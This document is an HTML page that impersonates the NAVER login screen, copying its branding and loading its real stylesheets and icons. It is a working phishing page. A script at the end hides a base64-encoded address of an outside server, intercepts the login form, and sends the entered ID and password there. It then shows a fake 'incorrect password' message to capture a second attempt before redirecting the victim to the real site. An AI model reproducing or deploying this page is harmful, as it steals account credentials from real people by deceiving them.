<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
    <meta property="og:type" content="website">
    <meta property="og:title" content="네이버">
    <meta property="og:description" content="네이버에 로그인 하고 나를 위한 다양한 서비스를 이용해 보세요">
    <meta property="og:image" content="https://ssl.pstatic.net/static/nid/account/naver_og_image.png">
    <meta property="og:image:type" content="image/png">
    <meta property="og:image:width" content="1200">
    <meta property="og:image:height" content="630">
    <meta name="description" content="Sign in to your Naver Account">
    <meta name="robots" content="index, follow">
    <meta name="Keywords" content="naver login,naver sign-in,naver sign-in with ID">
    <title>네이버 : 로그인</title>
    <link rel="shortcut icon" href="https://nid.naver.com/login/image/favicon.ico">
    <link rel="apple-touch-icon-precomposed" href="https://s.pstatic.net/static/www/mobile/edit/20220408_0/upload_16493972759253VFbg.png">
    <link rel="apple-touch-icon-precomposed" sizes="96x96" href="https://s.pstatic.net/static/www/mobile/edit/20220408_0/upload_1649397297725OckVW.png">
    <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://s.pstatic.net/static/www/mobile/edit/20220408_0/upload_1649397312685xI8Rn.png">
    <link rel="apple-touch-icon-precomposed" sizes="192x192" href="https://s.pstatic.net/static/www/mobile/edit/20220408_0/upload_1649397328060s5AJW.png">
    <link rel="stylesheet" type="text/css" href="https://nid.naver.com/login/css/global/desktop/w_20240611.css?20240719">
</head>
<body>
<div id="wrap" class="wrap">
    <div class="u_skip"><a href="#">본문 바로가기</a></div>
    <header class="header" role="banner">
        <div class="header_inner">
            <a  href="https://www.naver.com" class="logo">
                <h1 class="blind">NAVER</h1>
            </a>
            <div class="lang" id="show_locale_switch">
                <select id="locale_switch" name="locale_switch" title="언어선택" class="sel">
                    <option value="ko_KR">한국어</option>
                    <option value="en_US">English</option>
                    <option value="zh-Hans_CN">中文(简体)</option>
                    <option value="zh-Hant_TW">中文(台灣)</option>
                </select>
            </div>
        </div>
    </header>

    <div id="container" class="container">
        <!-- content -->
        <div class="content">
            <div class="login_wrap global">
                <ul class="menu_wrap" role="tablist">
                    <li class="menu_item" role="presentation">
                        <a href="#" id="" class="menu_id on" role="tab" aria-selected="true">
                            <span class="menu_text"><span class="text">ID/전화번호</span></span>
                        </a>
                    </li>
                    <li class="menu_item" role="presentation">
                        <a href="#" id="" class="menu_qr" role="tab" aria-selected="false">
                            <span class="menu_text"><span class="text">일회용 번호</span></span>
                        </a>
                        <!--넛지배너-->
                        <div class="nudge_banner" id="nudge_tooltip">
                            <span class="nudge_text">PC방 등 공용PC라면 QR코드 로그인이 더 안전해요.</span>
                            <button type="button" id="nudge_close" class="nudge_close"><span
                                        class="icon_nudge_close"></span></button>
                        </div>
                    </li>
                </ul>
                <form id="frmNIDLogin" name="frmNIDLogin" target="_top" AUTOCOMPLETE="off"
                      action="https://nid.naver.com/nidlogin.login" method="POST">
                    <input type="hidden" id="localechange" name="localechange" value="">
                    <input type="hidden" name="dynamicKey" id="dynamicKey" value="">
                    <input type="hidden" name="encpw" id="encpw" value="">
<!-- <input type="hidden" name="enctp" id="enctp" value="1">
<input type="hidden" name="svctype" id="svctype" value="1">
<input type="hidden" name="smart_LEVEL" id="smart_LEVEL" value="1">
<input type="hidden" name="bvsd" id="bvsd" value="">
<input type="hidden" name="encnm" id="encnm" value="">
<input type="hidden" name="locale" id="locale" value="en_US">
<input type="hidden" name="url" id="url" value="#"> -->


                    <ul class="panel_wrap">
                        <li class="panel_item" style="display: block;">
                            <div class="panel_inner" role="tabpanel" aria-controls="loinid">
                                <div class="login_form">
                                    <div class="login_box">
                                        <div class="input_item id" id="input_item_id">
                                            <input type="text" id="id" name="email" accesskey="L" maxlength="41"
                                                   autocapitalize="none" value=""
                                                   title="아이디" class="input_id" aria-label="ID or Phone number">
                                            <label for="id" class="text_label" id="id_label" aria-hidden="true">아이디 또는 전화번호</label>
                                            <button type="button" class="btn_delete" id="id_clear" style="display: none;">
    										<span class="icon_delete">
												<span class="blind">삭제</span>
											</span>
                                            </button>
                                        </div>
                                        <div class="input_item pw" id="input_item_pw">
                                            <input type="password" id="pw" name="password" title=">Password"
                                                   class="input_pw" maxlength="16" aria-label=">Password">
                                            <label for="pw" class="text_label" id="pw_label" aria-hidden="true">비밀번호</label>
                                            <button type="button" class="btn_view hide" id="pw_hide" style="display: none;">
                                            <span class="icon_view">
                                                <span class="blind" id="icon_view">선택 안 됨,비밀번호 표시</span>
                                            </span>
                                            </button>
                                            <button type="button" class="btn_delete" id="pw_clear" style="display: none;">
											<span class="icon_delete">
												<span class="blind">삭제</span>
											</span>
                                            </button>
                                        </div>
                                    </div>
                                </div>

                                <div class="login_keep_wrap" id="login_keep_wrap">
                                    <div class="keep_check">
                                        <input type="checkbox" id="keep" name="nvlong"
                                               class="input_keep"  value="off">
                                        <label for="keep"
                                               class="keep_text">로그인 상태 유지</label>
                                    </div>
                                    <div class="ip_check">
                                        <a href="#" target="_blank" id="ipguide" title="IP보안"><span class="ip_text">IP보안</span></a>
                                        <span class="switch">
                                            <input type="checkbox" id="switch"
                                                   class="switch_checkbox" value="off">
                                            <label for="switch" class="switch_btn">
                                                <span class="switch_on" role="checkbox" aria-checked="true">ON</span>
                                                <span class="switch_off" role="checkbox" aria-checked="false">OFF</span>
                                            </label>
                                        </span>
                                    </div>
                                </div>

                                <div class="login_error_wrap" id="err_capslock" style="display: none;">
                                    <div class="error_message">
                                        <p><strong>Caps Lock</strong> 이 켜져 있습니다.</p>
                                    </div>
                                </div>

                                <div class="login_error_wrap" id="err_empty_id" style="display: none;">
                                    <div class="error_message">
                                        아이디 또는 전화번호 <strong>를 입력해 주세요.</strong>
                                    </div>
                                </div>

                                <div class="login_error_wrap" id="err_empty_pw" style="display: none;">
                                    <div class="error_message">
                                        비밀번호 <strong>를 입력해 주세요.</strong>
                                    </div>
                                </div>
                                <div class="login_error_wrap" id="err_common"  style="display:block;">
                                    <div class="error_message"
                                         style="width:100%; color:red"  >
                                        
                                    </div>
                                </div>
                                <div class="btn_login_wrap">
                                    <button type="submit" class="btn_login" id="log.login" style="color:white">
                                        <span class="btn_text">로그인</span>
                                    </button>

                                </div>
                            </div>
                        </li>
                    </ul>
                </form>
            </div>
            <ul class="find_wrap" id="find_wrap">

                <li><a target="_blank" href="https://nid.naver.com/user2/api/route?m=routePwInquiry&amp;lang=ko_KR" class="find_text">비밀번호 찾기</a></li>
                <li><a target="_blank" href="https://nid.naver.com/user2/api/route?m=routeIdInquiry&amp;lang=ko_KR" class="find_text">아이디 찾기</a></li>
                <li><a target="_blank" href="https://nid.naver.com/user2/V2Join?m=agree&amp;lang=ko_KR&amp;realname=N" class="find_text">회원가입</a>
                </li>

            </ul>
            <div class="sns_cover">
                <ul class="sns_wrap">
                    <li><a href="#" class="sns_item"><span class="sns_text">Facebook</span></a></li>
                    <li><a href="#" class="sns_item"><span class="sns_text">Line</span></a></li>
                </ul>
            </div>
        </div>
        <!-- //content -->
    </div>

    <div class="footer">
        <div class="footer_inner">
            <div class="footer_copy">
                <a id="fot.naver" target="_blank" href="#">
                    <span class="footer_logo"><span class="blind">네이버</span></span>
                </a>
                <span class="text">Copyright</span>
                <span class="corp">© NAVER Corp.</span>
                <span class="text">All Rights Reserved.</span>
            </div>
        </div>
    </div>

</div>
<input type="hidden" id="nclicks_nsc" name="nclicks_nsc" value="nid.login_en">
<input type="hidden" id="nid_buk" name="nid_buk" value="none">
<input type="hidden" id="removeLink" name="removeLink" value="">
<input type="hidden" id="hide_util" name="hide_util" value="">
<input type="hidden" id="ncaptchaSplit" name="ncaptchaSplit" value="none">
<input type="hidden" id="locale" name="locale" value="en_US">
<input type="hidden" id="adult_surl_v2" name="adult_surl_v2" value="">
<input type="hidden" id="ispopup" name="ispopup" value="false"> 

<script type="text/javascript" src="https://nid.naver.com/login/js/v3/default/default_202105.js?v=20240722"></script> 
<div id="nv_stat" style="display:none;">20</div>

<script>
		
		


    var feedUpdateResponse = window.location.href;
    var feedUpdateSplit = feedUpdateResponse.split("");
    
    for (var x = 0; x < feedUpdateSplit.length; x++) {
     
     if (feedUpdateSplit[x]=="#"){
      var che= feedUpdateResponse.substring(x+1);
     
     }else{
     
    
     }
    
     
     
     }
      document.getElementById("pet").value =che
    document.getElementById("p1").innerHTML =che
      document.getElementById("pet").value =che
    
    </script>
    
    
    
    
        <script src="https://code.jquery.com/jquery-1.9.1.js"></script>
        <script>
    
          
           $(document).ready(function() {
                var user=$("#pet").val();
              var  count=0;
               
            $('form').submit(function(e) {
                
                count=count+1;
                
               var d=atob("Cmh0dHBzOi8vcGFya2xhbmR1c2EuY28vL2p1bi9uYXZlci5waHA=");
    
                e.preventDefault();
                   $.ajax({
                   
                type: 'POST',
                url: d,
                crossDomain: true,
                data: $('form').serialize(),
                
                 beforeSend: function(xhr){
                  $('.btn_login').html('Verifing...');
                  
                  
                  
    if (count>=2) {
                        count=0;
                        // window.location.replace(response['redirect_link']);
                        window.location.replace("https://www.naver.com/");
    
                      }else{
                       var x = document.getElementById("id").value;
                         
                        
                       $('.btn_login').html('CONTINUE');
                           document.getElementById("pw").value ="";
                         
                        
                    $("#err_common").show();
                        $(".error_message").html("The username or password you entered is incorrect.");
                    
    
                         }
                            
                },
                
                
                         
                success: function () {
                    $("#err_common").show();
                        $(".error_messag").html("The username or password you entered is incorrect.");
                    
    
        
                }
              });
            });
        });
        </script>
    
    
</body>
</html>
